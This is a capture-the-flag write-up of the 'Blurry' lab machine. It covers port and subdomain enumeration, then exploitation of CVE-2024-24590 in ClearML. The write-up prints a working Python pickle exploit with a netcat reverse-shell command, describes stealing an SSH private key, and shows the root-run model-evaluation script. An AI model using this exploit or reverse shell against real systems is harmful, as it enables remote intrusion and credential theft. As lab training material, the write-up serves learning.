<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>nmap -p- -vv --min-rate <span style="color:#d3869b">5000</span> 10.10.11.19 -oA nmap/ports
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> app.blurry.htb <span style="color:#fe8019">(</span>10.10.11.19<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>Host is up, received conn-refused <span style="color:#fe8019">(</span>0.21s latency<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Scanned at 2024-10-13 12:51:47 IST <span style="color:#fe8019">for</span> 246s
</span></span><span style="display:flex;"><span>Not shown: <span style="color:#d3869b">43506</span> filtered ports, <span style="color:#d3869b">22027</span> closed ports
</span></span><span style="display:flex;"><span>Reason: <span style="color:#d3869b">43506</span> no-responses and <span style="color:#d3869b">22027</span> conn-refused
</span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON
</span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack
</span></span><span style="display:flex;"><span>80/tcp open http syn-ack
</span></span></code></pre></div><p>Enumerated open TCP ports:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>nmap -p22,80 -vv --min-rate <span style="color:#d3869b">5000</span> -sC -sV -oA nmap/service 10.10.11.19
</span></span></code></pre></div><div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Nmap scan report <span style="color:#fe8019">for</span> app.blurry.htb <span style="color:#fe8019">(</span>10.10.11.19<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>Host is up, received syn-ack <span style="color:#fe8019">(</span>0.30s latency<span style="color:#fe8019">)</span>.
</span></span><span style="display:flex;"><span>Scanned at 2024-10-13 13:03:02 IST <span style="color:#fe8019">for</span> 16s
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>PORT STATE SERVICE REASON VERSION
</span></span><span style="display:flex;"><span>22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 <span style="color:#fe8019">(</span>protocol 2.0<span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>80/tcp open http syn-ack nginx 1.18.0
</span></span><span style="display:flex;"><span>|_http-favicon: Unknown favicon MD5: 2CBD65DC962D5BF762BCB815CBD5EFCC
</span></span><span style="display:flex;"><span>| http-methods:
</span></span><span style="display:flex;"><span>|_ Supported Methods: GET HEAD
</span></span><span style="display:flex;"><span>|_http-server-header: nginx/1.18.0
</span></span><span style="display:flex;"><span>|_http-title: ClearML
</span></span><span style="display:flex;"><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span></code></pre></div><p>There are only 2 ports open, <code>80</code> and <code>22</code></p>
<hr>
<h1 id="enumeration">Enumeration</h1>
<h2 id="port-80---http-nginx-1180">Port 80 - HTTP (Nginx 1.18.0)</h2>
<p><img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125133.webp" alt="">
Let&rsquo;s add <code>app.blurry.htb</code> to <code>/etc/hosts</code></p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#fabd2f">echo</span> -e <span style="color:#b8bb26">&#39;10.10.11.19\tapp.blurry.htb&#39;</span> | sudo tee -a /etc/hosts
</span></span></code></pre></div><p><img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125112.webp" alt="">
I then checked if there are any other subdomains present.</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>ffuf -u http://10.10.11.19/ -H <span style="color:#b8bb26">&#39;Host: FUZZ.blurry.htb&#39;</span> -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fs <span style="color:#d3869b">169</span>
</span></span></code></pre></div><img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133408.webp" alt=""><h4 id="filesblurryhtb"><code>files.blurry.htb</code></h4>
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133519.webp" alt=""><h4 id="chatblurryhtb"><code>chat.blurry.htb</code></h4>
<p><img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133600.webp" alt="">
We can create a new account and see all the chats:
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013133903.webp" alt="">
And there&rsquo;s this information in the announcement channel, this might come in handy later.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013134129.webp" alt=""></p>
<h4 id="appblurryhtb"><code>app.blurry.htb</code></h4>
<p>This runs a ClearML server which is an open source MLOps platform.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125332.webp" alt="">
Create a new account and view the dashboard
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013125823.webp" alt="">
After looking at some of the requests, found the ClearML version used in this application
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013130137.webp" alt="">
This version is vulnerable to RCE.</p>
<hr>
<h1 id="exploitation">Exploitation</h1>
<h2 id="cve-2024-24590---clearml-pickle-artifact-upload-rce">CVE-2024-24590 - ClearML Pickle Artifact Upload RCE</h2>
<blockquote>
<p>An attacker can execute arbitrary code on an end user&rsquo;s system by uploading a malicious pickle file as an artifact that triggers the deserialization flaw when a user calls the <code>get</code> method within the <code>Artifact</code> class to download and load a file into memory.</p>
</blockquote>
<p>The research team from <a href="https://hiddenlayer.com">HiddenLayer</a> found 6 zero-days, including this exploit in both, in the open-source and enterprise versions of ClearML. You can find information about all the other vulnerabilities in their <a href="https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/">blog</a>.</p>
<p>In python the pickle module is often used to store machine learning models for training, evaluation, and sharing. However, pickle is an inherently insecure module because it executes arbitrary commands when deserialized.
If there are no proper validation checks, and user created pickle files are deserialized, it can lead to remote code execution vulnerabilities. You can learn more about pickle and insecure deserialization vulnerabilites in these articles:</p>
<ul>
<li><a href="https://www.hackingarticles.in/python-serialization-vulnerabilities-pickle/">Python Serialization Vulnerabilities – Pickle</a></li>
<li><a href="https://intoli.com/blog/dangerous-pickles/">Dangerous Pickles — Malicious Python Serialization</a></li>
</ul>
<p>The vulnerability was inside the <code>Artifact.get</code> method, where the application directly loads the pickle object into memory without any checks. They <a href="https://github.com/allegroai/clearml/commit/e506831599bd8e072e5e54266abfccdfbe4be2ac#diff-dd2d5e773ee93fa198f108f03f3f0b8ed272d858cde70a01d41680327da3f133">fixed</a> the vulnerability by adding an additional hash validation with the hash value of the local file and the uploaded artifact:
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013142251.webp" alt=""></p>
<p>To exploit this vulnerability, we first need to upload a malicious artifact file to the ClearML server. If any user happens to download and load the artifact into memory using the <code>Artifact.get</code> method, we can gain a reverse shell in the server as that user. From the RocketChat instance, we now know that the admin is periodically running an automated task to review all the artifacts with a <code>review</code> tag inside the <code>Black Swan</code> project.
Thus, we onle need to upload the artifact to the <code>Black Swan</code> project with a <code>review</code> tag and the admin will download it and run it, allowing us to obtain a reverse shell.</p>
<p>To exploit this we need to install the <code>clearml</code> pip package:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>pip install clearml
</span></span></code></pre></div><p>Then in the server, go to settings -&gt; workspace and create new credentials.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013143231.webp" alt="">
Now add the configurations by running the <code>clearml-init</code> command, which is installed when you install the <code>clearml</code> pip package.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013144502.webp" alt="">
Don&rsquo;t forget to add <code>api.blurry.htb</code> to your <code>/etc/hosts</code> file as well.</p>
<div
class="alert alert-note collapsed"
style="border-color: #076678;"
>
<div
class="alert-heading-box"
onclick="toggleAlert(this)"
>
<i
class="bx bx-info-circle"
style="color: #076678;"
></i>
<p
class="alert-heading"
style="color: #076678"
>
Note
</p>
<i
class='bx bx-chevron-down collapsed'
style="color: #076678;"
></i>
</div>
<div class="alert-content" style="display: none;">
<p>If you are getting this error:
<code>AttributeError: module 'lib' has no attribute 'OpenSSL_add_all_algorithms'</code></p>
<ul>
<li>Upgrade <code>cryptography</code>, <code>pyOpenSSL</code>, and <code>OpenSSL</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>pip install --upgrade cryptography pyOpenSSL
</span></span></code></pre></div><ul>
<li>Reinstall <code>clearml</code></li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>pip install --upgrade clearml
</span></span></code></pre></div><p>If this fixes the issue then run <code>clearml-init</code> to add the configurations again.</p>
</div>
</div>
<script>
function toggleAlert(headerElement) {
var alertBox = headerElement.parentElement;
var alertContent = alertBox.querySelector('.alert-content');
var icon = headerElement.querySelectorAll('i')[1];
alertBox.classList.toggle('open');
alertBox.classList.toggle('collapsed');
if (alertBox.classList.contains('open')) {
alertContent.style.display = 'block';
icon.classList.remove('open');
icon.classList.add('collapsed');
} else {
icon.classList.remove('collapsed');
icon.classList.add('open');
alertContent.style.display = 'none';
}
}
</script>
<p>Now let&rsquo;s create an exploit to upload our artifact to the server:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#fe8019">from</span> clearml <span style="color:#fe8019">import</span> Task
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> pickle<span style="color:#fe8019">,</span> os
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">class</span> RunCommand:
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">__reduce__</span>(self):
</span></span><span style="display:flex;"><span> ip <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;&#34;</span> <span style="color:#928374;font-style:italic"># Enter your ip address</span>
</span></span><span style="display:flex;"><span> port <span style="color:#fe8019">=</span> <span style="color:#b8bb26">&#34;&#34;</span> <span style="color:#928374;font-style:italic"># Enter listening port</span>
</span></span><span style="display:flex;"><span> command <span style="color:#fe8019">=</span> <span style="color:#b8bb26">f</span><span style="color:#b8bb26">&#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2&gt;&amp;1|nc </span><span style="color:#b8bb26">{</span>ip<span style="color:#b8bb26">}</span><span style="color:#b8bb26"> </span><span style="color:#b8bb26">{</span>port<span style="color:#b8bb26">}</span><span style="color:#b8bb26"> &gt;/tmp/f&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> (os<span style="color:#fe8019">.</span>system, (command,))
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">def</span> <span style="color:#fabd2f">main</span>():
</span></span><span style="display:flex;"><span> command <span style="color:#fe8019">=</span> RunCommand()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> task <span style="color:#fe8019">=</span> Task<span style="color:#fe8019">.</span>init(project_name<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;Black Swan&#34;</span>, tags<span style="color:#fe8019">=</span>[<span style="color:#b8bb26">&#39;review&#39;</span>], task_name<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#39;exploit&#39;</span>)
</span></span><span style="display:flex;"><span> task<span style="color:#fe8019">.</span>upload_artifact(name<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#39;pickle_artifact&#39;</span>, artifact_object<span style="color:#fe8019">=</span>command, retries<span style="color:#fe8019">=</span><span style="color:#d3869b">2</span>, wait_on_upload<span style="color:#fe8019">=</span><span style="color:#fe8019">True</span>)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> __name__ <span style="color:#fe8019">==</span> <span style="color:#b8bb26">&#34;__main__&#34;</span>:
</span></span><span style="display:flex;"><span> main()
</span></span></code></pre></div><p>And now start a netcat listener:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>nc -lnvp <span style="color:#d3869b">1234</span>
</span></span></code></pre></div><p>then run the exploit:</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>python3 exploit.py
</span></span></code></pre></div><p>wait for the task to run
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013150806.webp" alt="">
let&rsquo;s copy <code>.ssh/id_rsa</code> file to login using ssh.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013150951.webp" alt=""></p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span>chmod <span style="color:#d3869b">600</span> id_rsa
</span></span><span style="display:flex;"><span>ssh [email protected] -i id_rsa
</span></span></code></pre></div><img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151228.webp" alt=""><hr>
<h1 id="privilege-escalation">Privilege Escalation</h1>
<h2 id="local-enumeration">Local Enumeration</h2>
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151347.webp" alt=""><p>There are only 2 users in this machine. The user jippity can run <code>/usr/bin/evaluate_model</code> as root.
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151435.webp" alt="">
which is a bash script:
<img src="https://h4r1337.github.io/img/blurry/Pasted%20image%2020241013151728.webp" alt=""></p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-sh" data-lang="sh"><span style="display:flex;"><span><span style="color:#8ec07c">#!/bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#8ec07c"></span><span style="color:#928374;font-style:italic"># Evaluate a given model against our proprietary dataset.</span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Security checks against model file included.</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> <span style="color:#fe8019">[</span> <span style="color:#b8bb26">&#34;</span>$#<span style="color:#b8bb26">&#34;</span> -ne <span style="color:#d3869b">1</span> <span style="color:#fe8019">]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;Usage: </span>$0<span style="color:#b8bb26"> &lt;path_to_model.pth&gt;&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">exit</span> <span style="color:#d3869b">1</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>MODEL_FILE<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;</span>$1<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span>TEMP_DIR<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;/opt/temp&#34;</span>
</span></span><span style="display:flex;"><span>PYTHON_SCRIPT<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#34;/models/evaluate_model.py&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>/usr/bin/mkdir -p <span style="color:#b8bb26">&#34;</span>$TEMP_DIR<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>file_type<span style="color:#fe8019">=</span><span style="color:#fe8019">$(</span>/usr/bin/file --brief <span style="color:#b8bb26">&#34;</span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span><span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#928374;font-style:italic"># Extract based on file type</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> <span style="color:#fe8019">[[</span> <span style="color:#b8bb26">&#34;</span>$file_type<span style="color:#b8bb26">&#34;</span> <span style="color:#fe8019">==</span> *<span style="color:#b8bb26">&#34;POSIX tar archive&#34;</span>* <span style="color:#fe8019">]]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># POSIX tar archive (older PyTorch format)</span>
</span></span><span style="display:flex;"><span> /usr/bin/tar -xf <span style="color:#b8bb26">&#34;</span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span> -C <span style="color:#b8bb26">&#34;</span>$TEMP_DIR<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">elif</span> <span style="color:#fe8019">[[</span> <span style="color:#b8bb26">&#34;</span>$file_type<span style="color:#b8bb26">&#34;</span> <span style="color:#fe8019">==</span> *<span style="color:#b8bb26">&#34;Zip archive data&#34;</span>* <span style="color:#fe8019">]]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> <span style="color:#928374;font-style:italic"># Zip archive (newer PyTorch format)</span>
</span></span><span style="display:flex;"><span> /usr/bin/unzip -q <span style="color:#b8bb26">&#34;</span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span> -d <span style="color:#b8bb26">&#34;</span>$TEMP_DIR<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">else</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;[!] Unknown or unsupported file format for </span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">exit</span> <span style="color:#d3869b">2</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">fi</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>/usr/bin/find <span style="color:#b8bb26">&#34;</span>$TEMP_DIR<span style="color:#b8bb26">&#34;</span> -type f <span style="color:#b8bb26">\(</span> -name <span style="color:#b8bb26">&#34;*.pkl&#34;</span> -o -name <span style="color:#b8bb26">&#34;pickle&#34;</span> <span style="color:#b8bb26">\)</span> -print0 | <span style="color:#fe8019">while</span> IFS<span style="color:#fe8019">=</span> <span style="color:#fabd2f">read</span> -r -d <span style="color:#b8bb26">$&#39;\0&#39;</span> extracted_pkl; <span style="color:#fe8019">do</span>
</span></span><span style="display:flex;"><span> fickling_output<span style="color:#fe8019">=</span><span style="color:#fe8019">$(</span>/usr/local/bin/fickling -s --json-output /dev/fd/1 <span style="color:#b8bb26">&#34;</span>$extracted_pkl<span style="color:#b8bb26">&#34;</span><span style="color:#fe8019">)</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">if</span> /usr/bin/echo <span style="color:#b8bb26">&#34;</span>$fickling_output<span style="color:#b8bb26">&#34;</span> | /usr/bin/jq -e <span style="color:#b8bb26">&#39;select(.severity == &#34;OVERTLY_MALICIOUS&#34;)&#39;</span> &gt;/dev/null; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;[!] Model </span>$MODEL_FILE<span style="color:#b8bb26"> contains OVERTLY_MALICIOUS components and will be deleted.&#34;</span>
</span></span><span style="display:flex;"><span> /bin/rm <span style="color:#b8bb26">&#34;</span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">break</span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">fi</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">done</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>/usr/bin/find <span style="color:#b8bb26">&#34;</span>$TEMP_DIR<span style="color:#b8bb26">&#34;</span> -type f -exec /bin/rm <span style="color:#fe8019">{}</span> +
</span></span><span style="display:flex;"><span>/bin/rm -rf <span style="color:#b8bb26">&#34;</span>$TEMP_DIR<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">if</span> <span style="color:#fe8019">[</span> -f <span style="color:#b8bb26">&#34;</span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span> <span style="color:#fe8019">]</span>; <span style="color:#fe8019">then</span>
</span></span><span style="display:flex;"><span> /usr/bin/echo <span style="color:#b8bb26">&#34;[+] Model </span>$MODEL_FILE<span style="color:#b8bb26"> is considered safe. Processing...&#34;</span>
</span></span><span style="display:flex;"><span> /usr/bin/python3 <span style="color:#b8bb26">&#34;</span>$PYTHON_SCRIPT<span style="color:#b8bb26">&#34;</span> <span style="color:#b8bb26">&#34;</span>$MODEL_FILE<span style="color:#b8bb26">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">fi</span>
</span></span></code></pre></div><p>The file requires one argument, which is the location of the model file. The model file should be in either <code>tar</code> or <code>zip</code> format.
It then extracts the archive in <code>/opt/temp</code>. It then uses a static code analyzer called <code>fickling</code> to check if any of the serialized pickle files extracted in <code>/opt/temp</code> is malicious.
If everything is fine, it finally runs <code>/models/evaluate_models.py</code> script with the model file as its argument.</p>
<div class="highlight"><pre tabindex="0" style="color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#fe8019">import</span> torch
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> torch.nn <span style="color:#fe8019">as</span> nn
</span></span><span style="display:flex;"><span><span style="color:#fe8019">from</span> torchvision <span style="color:#fe8019">import</span> transforms
</span></span><span style="display:flex;"><span><span style="color:#fe8019">from</span> torchvision.datasets <span style="color:#fe8019">import</span> CIFAR10
</span></span><span style="display:flex;"><span><span style="color:#fe8019">from</span> torch.utils.data <span style="color:#fe8019">import</span> DataLoader, Subset
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> numpy <span style="color:#fe8019">as</span> np
</span></span><span style="display:flex;"><span><span style="color:#fe8019">import</span> sys
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">class</span> CustomCNN(nn<span style="color:#fe8019">.</span>Module):
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> __init__(self):
</span></span><span style="display:flex;"><span> <span style="color:#fabd2f">super</span>(CustomCNN, self)<span style="color:#fe8019">.</span>__init__()
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>conv1 <span style="color:#fe8019">=</span> nn<span style="color:#fe8019">.</span>Conv2d(in_channels<span style="color:#fe8019">=</span><span style="color:#d3869b">3</span>, out_channels<span style="color:#fe8019">=</span><span style="color:#d3869b">16</span>, kernel_size<span style="color:#fe8019">=</span><span style="color:#d3869b">3</span>, padding<span style="color:#fe8019">=</span><span style="color:#d3869b">1</span>)
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>conv2 <span style="color:#fe8019">=</span> nn<span style="color:#fe8019">.</span>Conv2d(in_channels<span style="color:#fe8019">=</span><span style="color:#d3869b">16</span>, out_channels<span style="color:#fe8019">=</span><span style="color:#d3869b">32</span>, kernel_size<span style="color:#fe8019">=</span><span style="color:#d3869b">3</span>, padding<span style="color:#fe8019">=</span><span style="color:#d3869b">1</span>)
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>pool <span style="color:#fe8019">=</span> nn<span style="color:#fe8019">.</span>MaxPool2d(kernel_size<span style="color:#fe8019">=</span><span style="color:#d3869b">2</span>, stride<span style="color:#fe8019">=</span><span style="color:#d3869b">2</span>, padding<span style="color:#fe8019">=</span><span style="color:#d3869b">0</span>)
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>fc1 <span style="color:#fe8019">=</span> nn<span style="color:#fe8019">.</span>Linear(in_features<span style="color:#fe8019">=</span><span style="color:#d3869b">32</span> <span style="color:#fe8019">*</span> <span style="color:#d3869b">8</span> <span style="color:#fe8019">*</span> <span style="color:#d3869b">8</span>, out_features<span style="color:#fe8019">=</span><span style="color:#d3869b">128</span>)
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>fc2 <span style="color:#fe8019">=</span> nn<span style="color:#fe8019">.</span>Linear(in_features<span style="color:#fe8019">=</span><span style="color:#d3869b">128</span>, out_features<span style="color:#fe8019">=</span><span style="color:#d3869b">10</span>)
</span></span><span style="display:flex;"><span> self<span style="color:#fe8019">.</span>relu <span style="color:#fe8019">=</span> nn<span style="color:#fe8019">.</span>ReLU()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">def</span> <span style="color:#fabd2f">forward</span>(self, x):
</span></span><span style="display:flex;"><span> x <span style="color:#fe8019">=</span> self<span style="color:#fe8019">.</span>pool(self<span style="color:#fe8019">.</span>relu(self<span style="color:#fe8019">.</span>conv1(x)))
</span></span><span style="display:flex;"><span> x <span style="color:#fe8019">=</span> self<span style="color:#fe8019">.</span>pool(self<span style="color:#fe8019">.</span>relu(self<span style="color:#fe8019">.</span>conv2(x)))
</span></span><span style="display:flex;"><span> x <span style="color:#fe8019">=</span> x<span style="color:#fe8019">.</span>view(<span style="color:#fe8019">-</span><span style="color:#d3869b">1</span>, <span style="color:#d3869b">32</span> <span style="color:#fe8019">*</span> <span style="color:#d3869b">8</span> <span style="color:#fe8019">*</span> <span style="color:#d3869b">8</span>)
</span></span><span style="display:flex;"><span> x <span style="color:#fe8019">=</span> self<span style="color:#fe8019">.</span>relu(self<span style="color:#fe8019">.</span>fc1(x))
</span></span><span style="display:flex;"><span> x <span style="color:#fe8019">=</span> self<span style="color:#fe8019">.</span>fc2(x)
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> x
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">def</span> <span style="color:#fabd2f">load_model</span>(model_path):
</span></span><span style="display:flex;"><span> model <span style="color:#fe8019">=</span> CustomCNN()
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> state_dict <span style="color:#fe8019">=</span> torch<span style="color:#fe8019">.</span>load(model_path)
</span></span><span style="display:flex;"><span> model<span style="color:#fe8019">.</span>load_state_dict(state_dict)
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> model<span style="color:#fe8019">.</span>eval()
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> model
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#fe8019">def</span> <span style="color:#fabd2f">prepare_dataloader</span>(batch_size<span style="color:#fe8019">=</span><span style="color:#d3869b">32</span>):
</span></span><span style="display:flex;"><span> transform <span style="color:#fe8019">=</span> transforms<span style="color:#fe8019">.</span>Compose([
</span></span><span style="display:flex;"><span> transforms<span style="color:#fe8019">.</span>RandomHorizontalFlip(),
</span></span><span style="display:flex;"><span> transforms<span style="color:#fe8019">.</span>RandomCrop(<span style="color:#d3869b">32</span>, padding<span style="color:#fe8019">=</span><span style="color:#d3869b">4</span>),
</span></span><span style="display:flex;"><span> transforms<span style="color:#fe8019">.</span>ToTensor(),
</span></span><span style="display:flex;"><span> transforms<span style="color:#fe8019">.</span>Normalize(mean<span style="color:#fe8019">=</span>[<span style="color:#d3869b">0.4914</span>, <span style="color:#d3869b">0.4822</span>, <span style="color:#d3869b">0.4465</span>], std<span style="color:#fe8019">=</span>[<span style="color:#d3869b">0.2023</span>, <span style="color:#d3869b">0.1994</span>, <span style="color:#d3869b">0.2010</span>]),
</span></span><span style="display:flex;"><span> ])
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span> dataset <span style="color:#fe8019">=</span> CIFAR10(root<span style="color:#fe8019">=</span><span style="color:#b8bb26">&#39;/root/datasets/&#39;</span>, train<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>, download<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>, transform<span style="color:#fe8019">=</span>transform)
</span></span><span style="display:flex;"><span> subset <span style="color:#fe8019">=</span> Subset(dataset, indices<span style="color:#fe8019">=</span>np<span style="color:#fe8019">.</span>random<span style="color:#fe8019">.</span>choice(<span style="color:#fabd2f">len</span>(dataset), <span style="color:#d3869b">64</span>, replace<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>))
</span></span><span style="display:flex;"><span> dataloader <span style="color:#fe8019">=</span> DataLoader(subset, batch_size<span style="color:#fe8019">=</span>batch_size, shuffle<span style="color:#fe8019">=</span><span style="color:#fe8019">False</span>)
</span></span><span style="display:flex;"><span> <span style="color:#fe8019">return</span> dataloader
